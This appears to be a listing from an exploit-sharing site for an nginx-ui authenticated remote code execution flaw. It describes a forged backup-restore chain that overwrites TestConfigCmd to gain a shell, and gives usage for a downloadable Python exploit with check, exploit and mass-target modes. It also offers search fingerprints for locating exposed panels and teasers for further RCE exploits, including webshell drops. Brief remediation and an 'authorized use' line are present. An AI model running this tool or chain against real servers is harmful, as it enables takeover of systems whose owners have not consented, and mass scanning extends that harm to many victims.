CVE-2026-107806 — nginx-ui 2.3.8–2.4.x Authenticated RCE (Forged Backup Restore / TestConfigCmd)
October 10, 2026 · 60 views
0xJacky/nginx-ui >=2.3.8 <2.5.0: admin JWT can download backup, tamper app.ini TestConfigCmd in re-signed zip, POST /api/restore + /api/nginx/test → shell (CWE-94). CVSS 4.0 9.4 Critical PR:H. Not CVE-2026-42238. Fixed 2.5.0. Python PoC: check/exploit, batch url|JWT. Marker POCBIT-107806-OK.
Description
Overview
CVE-2026-107806 — nginx-ui (0xJacky/nginx-ui) — authenticated remote code execution via forged portable backup restore overwriting app.ini → TestConfigCmd executed on POST /api/nginx/test (CWE-94).
| | | |---|---| | Affected | ≥ 2.3.8, < 2.5.0 | | Fixed | 2.5.0 (GHSA-p393-cf76-4jmr) | | CVSS 4.0 | 9.4 Critical — PR:H (admin JWT required) | | Verify marker | POCBIT-107806-OK |
Not the same as CVE-2026-42238 (unauthenticated install-window restore); 2.3.8 added auth on restore, but post-auth trust on attacker-supplied AES backup key remained until 2.5.0.
PoC page: https://pocbit.org/pocs/cve-2026-107806
GitHub: murrez/CVE-2026-107806
CVE.org: CVE-2026-107806
Attack chain (summary)
- GET /api/backup — encrypted backup; read
X-Backup-Security(key_b64:iv_b64). - Decrypt
nginx-ui.zip, patchapp.ini→[nginx] TestConfigCmd. - Re-encrypt, update
manifest.json, re-signmanifest.sig(nginx-ui-backup-signing-v1:+ AES key). - POST /api/restore with malicious zip.
- POST /api/nginx/test — runs
TestConfigCmdvia/bin/sh -c.
Bundled tool (Python 3)
Download cve-2026-107806.py — writes poc.py, requirements.txt, targets.example.txt.
python cve-2026-107806.py
pip install -r requirements.txt
python poc.py -u http://127.0.0.1:8080 --mode check
python poc.py -u https://panel.example --token 'eyJhbG...' --mode check --json
python poc.py -u https://panel.example --token 'eyJhbG...' --mode exploit --insecure
python poc.py -u https://panel.example --token '...' --secure-session '...' --mode exploit
python poc.py --list targets.txt --mode exploit -j 5 --insecure
List format: url, url|JWT, or url|JWT|SECURE_SESSION_ID.
Outputs: cve_2026_107806_exploit.jsonl, hits.txt, exploited.txt.
Obtain JWT from authorized admin session (browser DevTools / login flow). 2FA: pass --secure-session.
Discovery hints (your assets only)
title="Nginx UI" || body="nginx-ui"
port="9000" || port="8080"
FOFA does not prove vulnerable version — use --mode check with valid admin token.
Remediation
- Upgrade nginx-ui to ≥ 2.5.0.
- Restrict admin panel to management networks; MFA on admin accounts.
- Audit backup/restore and
nginx/testAPI usage in logs.
Legal and ethical use
Authorized security testing only.
References
Related PoCs
Same platform, vendor, or tags — explore more write-ups on Pocbit.
- Web appCVE-2026-82531critical
CVE-2026-82531 — Smarty Template Cache Poisoning RCE (SmartyNocache / extends)
smarty-php/smarty <4.5.8 and 5.0.0–5.8.4: extends/inheritance + cache regen with null nocache_hash lets forged assign() data inject SmartyNocache markers into cache PHP → include() RCE. CWE-94, CVSS 4.0 9.2 Critical (AT:P). Fixed 4.5.8 / 5.8.5. Python PoC: check/exploit/payload, Docker lab 5.8.4, hits.txt & exploited.txt. Marker POCBIT-82531-OK.
- Web appCVE-2026-106445critical
CVE-2026-106445 — Handlebars 4.0.0–4.7.9 RCE (Function.prototype.constructor Bypass)
handlebars 4.0.0–4.7.9: lookupProperty own-property order bypasses proto deny list → Function.prototype.constructor → sandbox escape when allowProtoMethodsByDefault:true and attacker-controlled compile (CWE-184/CWE-1289). CVSS 4.0 9.2 Critical AT:P. Fixed 4.7.10 GHSA-p8wg-vrv2-v86f. Python PoC: check/exploit, Docker lab, --render-path. Marker POCBIT-106445-OK.
- Web appCVE-2026-85520critical
CVE-2026-85520 — PrestaShop gmfeed (MyPresta) Unauthenticated Arbitrary File Write → RCE
Google Merchant Center Feed (gmfeed) for PrestaShop ≤2.3.9: unauthenticated arbitrary file write on modules/gmfeed/feed.php when Save-to-file / URL export is enabled — attacker controls filename, path, extension, and body → PHP webshell → RCE. CVSS 9.3 Critical. Fixed in 2.3.10+ (2.4.1+ recommended). Python PoC: check, aggressive probe, exploit with marker stub, mass --list -j.
- JoomlaCVE-2026-102425critical
CVE-2026-102425 — Joomla Balbooa Forms (com_baforms) Field Shortcode → Unauthenticated RCE
Balbooa Forms for Joomla 1.0.0–2.4.3.3: when a public form runs PHP-after-submission via eval(), field shortcodes are replaced with raw visitor input inside double-quoted PHP — classic ";breakout;// → RCE. CVSS 4.0 9.5 Critical (AT:P). Fixed in 2.4.3.4. Not CVE-2026-67364. Python PoC: version + public form detect, check/exploit, up.php drop, interactive + mass -j.